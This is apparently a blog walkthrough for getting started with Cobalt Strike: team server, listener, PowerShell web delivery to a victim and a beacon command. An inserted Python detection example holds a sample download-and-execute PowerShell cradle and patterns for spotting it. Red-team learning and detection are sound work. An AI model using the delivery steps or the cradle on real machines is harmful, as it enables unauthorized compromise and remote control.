As an aspiring Red Teamer, I’ve lately started playing with Cobalt Strike, and I thought it would be a good idea to start a series of blog posts on using it and its many features. As some of you may be aware, Cobalt Strike is software for Adversary Simulations and Red Team Operations.
More information can be found here: https://www.cobaltstrike.com
In this first post, I will quickly go through how to get Cobalt Strike up and running on your system, creating a listener and interacting with a victim’s machine. This will be short and to the point.
If you haven’t used Cobalt Strike before, I’m going to assume that you haven’t got a full licensed copy. A trial copy can be requested at the following URL:
https://trial.cobaltstrike.com/
Installation and setup instructions can be found here:
https://www.cobaltstrike.com/support
Once you have your trial copy downloaded and the prerequisites installed, you can begin.
Starting the team server
From inside the Cobalt Strike directory, type the following command to start the team server. 192.168.0.12 is the IP address of my Kali Linux system. Note: the password can be anything you want.
./teamserver <IP Address> <password>
Starting Cobalt Strike
Type the following command to start the Cobalt Strike user interface:
./cobaltstrike
Connecting to the team server
Once you have started Cobalt Strike, you are required to connect to your team server. Fill in the details, including the password you set when starting the team server. The User field can be anything you want. Use your super cool hacker handle here. ;P
Cobalt Strike’s user interface
Once connected, you will be presented with the Cobalt Strike user interface, where you will interact with your agents and do all sorts of other cool stuff.
Creating a listener
You will be required to create a listener for your compromised machines to connect to. Simply click Cobalt Strike – Listeners.
Once the Listeners tab has loaded, click Add.
Give the listener a name; in this case, I called it “C2”. Select your desired payload, ensure the IP address is correct (the team server IP) and choose a port to listen on.
Here you can input a domain name that points to your team server. We will use an IP address in this case.
The listener has been created and can be viewed, deleted, etc. from the Listeners tab.
Delivering the payload
We are now going to quickly compromise a host and have it connect to our team server in order to interact with it.
Select Attacks – Web Drive-by – Scripted Web Delivery
This will provide us with a PowerShell one-liner to run on the victim host.
Here we select the options to configure our quick web server to host and deliver the PowerShell one-liner.
Copy the URL provided.
Switch over to the victim’s machine and paste in the PowerShell one-liner. Just to be clear, this is for demonstration purposes. In reality, the payload would be delivered to the victim via some form of social engineering attack.
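From the blue-team side, the delivery step above is what shows up first in process-creation telemetry: a PowerShell one-liner that fetches and runs its stage from the team server's web server (an assumption about the one-liner's form; the post does not print it). As an added example that is not from the original post or from Cobalt Strike, here is a small Python check that scores command lines for the usual web-delivery traits. The sample command lines are constructed, not real captures, and the indicator list and threshold are illustrative assumptions.

```python
import re

# Constructed sample process-creation command lines (as seen in Sysmon Event ID 1
# or Windows Security 4688). Not real captures; made up for this example.
SAMPLE_COMMAND_LINES = [
    # Routine scheduled admin script: should not be flagged
    'powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1',
    # Web-delivery style cradle: hidden window, no profile, remote script run in memory
    'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://192.0.2.10:80/a\'))"',
    # Same idea hidden behind an encoded command (placeholder base64, not a real payload)
    'powershell.exe -NoP -NonI -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA',
    # Unrelated process: should not be flagged
    'notepad.exe C:\\Users\\alice\\notes.txt',
]

# (regex, human-readable indicator name). Assumed heuristics, not a vendor rule set.
INDICATORS = [
    (r'(?i)(?:^|\s)-(?:w|win|windowstyle)\s+hidden', 'hidden window'),
    (r'(?i)(?:^|\s)-(?:nop|noprofile)\b', 'no profile'),
    (r'(?i)\b(?:iex|invoke-expression)\b', 'in-memory execution (IEX)'),
    (r'(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b', 'remote download'),
    (r'(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}', 'encoded command'),
    (r'(?i)https?://\d{1,3}(?:\.\d{1,3}){3}', 'URL with bare IP address'),
]


def score_command_line(cmdline):
    """Return (score, matched indicator names) for a single command line."""
    hits = [name for pattern, name in INDICATORS if re.search(pattern, cmdline)]
    return len(hits), hits


def flag_suspicious(cmdlines, threshold=3):
    """Return [(command line, hits)] for lines with at least `threshold` indicators.

    Requiring several co-occurring traits keeps ordinary '-File' admin usage
    from being flagged while still catching the hidden, profile-less, download-and-run shape.
    """
    flagged = []
    for line in cmdlines:
        score, hits = score_command_line(line)
        if score >= threshold:
            flagged.append((line, hits))
    return flagged


if __name__ == "__main__":
    for line, hits in flag_suspicious(SAMPLE_COMMAND_LINES):
        print(f"SUSPICIOUS ({', '.join(hits)}): {line}")
```

In production the same scoring would run over real 4688/Sysmon events; PowerShell script block logging (Event ID 4104) additionally exposes the decoded content of the encoded variant.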
Interacting with the victim host
Once the PowerShell one-liner is executed, the victim will connect to the team server and be available for interaction.
To interact with the host, right click on the compromised host and click Interact.
For demonstration, I typed the following command:
beacon> shell ipconfig /all
Hopefully this gave you some insight into how easy it is to get started with Cobalt Strike. There will be many more blog posts surrounding this excellent product.
If you’re itching to learn more, I’d recommend reading through the Cobalt Strike manual: https://www.cobaltstrike.com/downloads/csmanual39.pdf